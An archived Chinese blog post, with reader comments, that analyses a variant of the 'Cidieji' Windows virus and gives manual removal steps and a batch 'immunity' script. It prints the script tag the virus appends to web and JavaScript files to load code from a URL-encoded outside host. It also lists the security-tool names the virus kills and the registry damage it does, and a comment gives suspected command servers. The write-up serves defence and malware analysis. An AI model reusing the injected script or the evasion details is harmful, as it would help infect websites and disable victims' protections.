寻梦网络,wangdi1900的个人空间,真诚期待与你成为朋友!

新年伊始警惕“磁碟机”新变种（LSASS.exe,SMSS.exe,netcfg.dll,pagefile.pif）

上一篇 / 下一篇 2008-04-06 20:52:41 / 个人分类：软件

新年伊始警惕“磁碟机”新变种（LSASS.exe,SMSS.exe,netcfg.dll,pagefile.pif）

来自清新阳光:http://hi.baidu.com/newcenturysun

最近磁碟机新变种肆虐，此变种几乎把现有所有的安全工具都毙掉了，导致几乎全部不能使用，并且感染exe（包括rar中的exe文件）html等网页文件，js脚本文件，且十分顽固，采用进线程相互守护等多种技术，可谓罪恶多端的一个病毒。

下面为此病毒的简要分析和查杀方法

File: pagefile.pif
Size: 88576 bytes
Modified: 2007年12月28日, 16:55:16
MD5: 2C6F3E41B1E909E795B5BCE70B3A44CC
SHA1: 3809D504ABC65D891CB0281BD9B599EA265C406C
CRC32: 225B0B61

1.病毒运行后，生成如下文件
C:\WINDOWS\system32\Com\LSASS.EXE
C:\WINDOWS\system32\Com\netcfg.000
C:\WINDOWS\system32\Com\netcfg.dll
C:\WINDOWS\system32\Com\SMSS.EXE
C:\WINDOWS\system32\894729.log
C:\WINDOWS\system32\dnsq.dll
C:\WINDOWS\system32\ntfsus.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\~.exe
或者在C:\Documents and Settings\用户名\「开始」菜单\程序\启动下面

netcfg.dll负责注入IE并连接网络下载木马
并注册为浏览器加载项
[IfObj Control]
{D9901239-34A2-448D-A000-3705544ECE9D} <C:\WINDOWS\system32\com\netcfg.dll, 506>

dnsq.dll会插入一些进程，并监控C:\WINDOWS\system32\Com\LSASS.EXE，如果该进程被结束，则立即恢复。
而且会监控~.exe，如果该文件被删除，立即重写。

894729.log即pagefile.pif文件
之中还会在C盘生成一个驱动，该驱动应该是用于提升权限所用
各个盘下面生成pagefile.pif和autorun.inf

2.通过查找窗口文字和和获得窗口线程进程ID等函数（GetWindowThreadProcessID）监控指定文字的窗口，之后会发送消息关闭窗口或者通过Terminate process函数结束进程，可能涉及的关键字如下：
avast
firewall
狙剑
bitdefender
escan
ewido
*升级
sreng 介绍
monitor
微点
费尔
antivir
金山
360anti
360safe
avg
dr.web
云
墙
升
瑞
mcagent

最终的结果是很多安全工具和杀毒软件不能使用，包括我们常用的Xdelbox，sreng，Icesword以及Icesword修改版...
该部分具体分析还请各位大大们指点...

3.以独占方式禁止读取各盘下面的根目录下面的pagefile.pif,autorun.inf,C:\boot.ini,C:\Windows\system32\drivers\hosts

C:\boot.ini不能写则Xdelbox等软件被废掉。

4.破坏安全模式
删除如下键
HKLM\SOFTWARE\Policies\Microsoft\Windows\Safer（和安全模式有关？）
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}

5.删除HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run键

6.破坏显示隐藏文件
HKU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden改为0x00000000

7.感染非系统分区下面部分exe文件和rar,zip压缩包内的exe文件

8.感染非系统分区下面的htm,html等网页文件
在其尾部加入<script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/*"></script>的代码
感染js等脚本文件
在其尾部加入document.write("<ScRiPt src='http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/*'></sCrIpT>");的代码

查杀方法：
下载sreng:http://download.kztechs.com/files/sreng2.zip
Icesword:http://mail.ustc.edu.cn/~jfpan/download/IceSword122cn.zip
经过以上分析发现病毒十分顽固，但貌似强大的病毒背后却有着致命的弱点，它只通过~.exe启动自身，没有其他启动项，所以我们完全可以通过映像劫持处理这个病毒。

1.将下列文字复制到记事本中，并保存为reg文件

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\~.exe]
"Debugger"="清新阳光"

双击导入注册表
重启计算机

2.重启后我们会发现病毒被困死了^_^
现在可以轻松的灭掉它们了

打开Icesword

点击左下角文件按钮
删除如下文件
C:\WINDOWS\system32\Com\LSASS.EXE
C:\WINDOWS\system32\Com\netcfg.000
C:\WINDOWS\system32\Com\netcfg.dll
C:\WINDOWS\system32\Com\SMSS.EXE
C:\WINDOWS\system32\894729.log
C:\WINDOWS\system32\dnsq.dll
C:\WINDOWS\system32\ntfsus.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\~.exe（一定不要忘记）
或C:\Documents and Settings\用户名\「开始」菜单\程序\启动\~.exe
以及各个分区下面的pagefile.pif和autorun.inf

3.打开sreng
系统修复－ Windows Shell/Ie 全选 - 修复
系统修复－高级修复修复安全模式

系统修复 — 浏览器加载项
删除[IfObj Control]
{D9901239-34A2-448D-A000-3705544ECE9D} <C:\WINDOWS\system32\com\netcfg.dll, 506>

4.使用杀毒软件全盘杀毒，修复受感染的exe文件（如果杀毒软件暂不能认出这个病毒，请暂时不要打开非系统分区下的exe以及压缩包内的exe文件！！！）

5.修复受感染的htm等网页文件

由于抓住了病毒作者的一个疏忽，所以以上查杀方法可能很快就会失效，所以在此征集更好的查杀方法，查找病毒的软肋，并希望大家在使用现在已有的使用比较广泛的工具中(sreng,Icesword,PE,Xdelbox...)研究查杀方案，不要再放出更新的杀毒工具来，那样会很快被病毒杀掉而致以后中毒了真的就"无药可救了"...

===================================

3 梦影xdl 2008-01-01 16:17 花花用OD来控制它.
http://hi.baidu.com/flowercode/blog/item/e5997008ea2000910a7b82a7.html

8 ks_tiejun 2008-01-02 10:22 名字很熟悉，手法也很老套，病毒持续更新的热情太高了。

9 残月水星 2008-01-02 11:22 4.使用杀毒软件全盘杀毒，修复受感染的exe文件（如果杀毒软件暂不能认出这个病毒，请暂时不要打开非系统分区下的exe以及压缩包内的exe文件！！！）

难道我们就坐以待毙么？哭死～～～我的机器原来瑞星实时监控可以查出，全盘杀毒的时候却查不到最近装了最新的瑞星竟然什么也查不出了，真是活见鬼了！！！！

11 网友:天月来了 2008-01-02 17:12 呵呵！！

这弄毒的怎不封注册表和那个映像劫持的注册表项的呢？

然后都去DOS下，WinPE下弄吧。

不知道那个SRENG工具主页上的那个延迟删除/重命名工具能不能将就弄掉~.exe。

我没试过。

13 没有梦想的男人 2008-01-02 21:01 昨晚给阳光样本之前.瑞星对此样本不报警.小红伞.金山.卡巴都报了.
今天14点再用升级后的瑞星扫描还是不报...汗啊...之后用金山全盘扫描可以查到感染的文件(包括exe.htm.html)带病毒.
病毒带连接下面地址
http://w.cOmo.com/r.htm
222.208.183.204
60.12.231.38
65.55.192.61
之后没继续玩.不知道会不会下载木马.

20 网友:黑石 2008-01-14 16:22 用NOD32杀毒软件可以查杀

23 kknt2002 2008-01-24 01:11
下面这个批处理免疫可以吗，有劳看看！防为主呀！

@echo off
cd\
md C:\WINDOWS\system32\Com\LSASS.EXE
cacls "C:\WINDOWS\system32\Com\LSASS.EXE" /d everyone

md C:\WINDOWS\system32\Com\netcfg.000
cacls "C:\WINDOWS\system32\Com\netcfg.000" /d everyone

md C:\WINDOWS\system32\Com\SMSS.EXE
cacls "C:\WINDOWS\system32\Com\SMSS.EXE" /d everyone

md C:\WINDOWS\system32\Com\894729.log
cacls "C:\WINDOWS\system32\Com\894729.log" /d everyone

md C:\WINDOWS\system32\Com\dnsq.dll
cacls "C:\WINDOWS\system32\Com\dnsq.dll" /d everyone

cd C:\Documents and Settings\All Users\「开始」菜单\程序\启动
md ~.exe
cacls "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\~.exe" /d everyone

这个可以在启动里建~.exe了。

24 kknt2002 2008-01-24 01:16 我有一个绿色版的NOD32!用PE过系统后，把NOD32设置为最高级杀毒模式后！

可以查杀！杀完后进正常系统，用360的木马查杀再来一次！把找到的粉碎，随便加上阻止再生成！

最后升级卡吧，再杀一次！

谢谢了呀，从的文章中得到不少信息呀，随手做了一个批处理，明天就给我管的电脑全打上。呵呵，防着好，真中了忙都忙死了。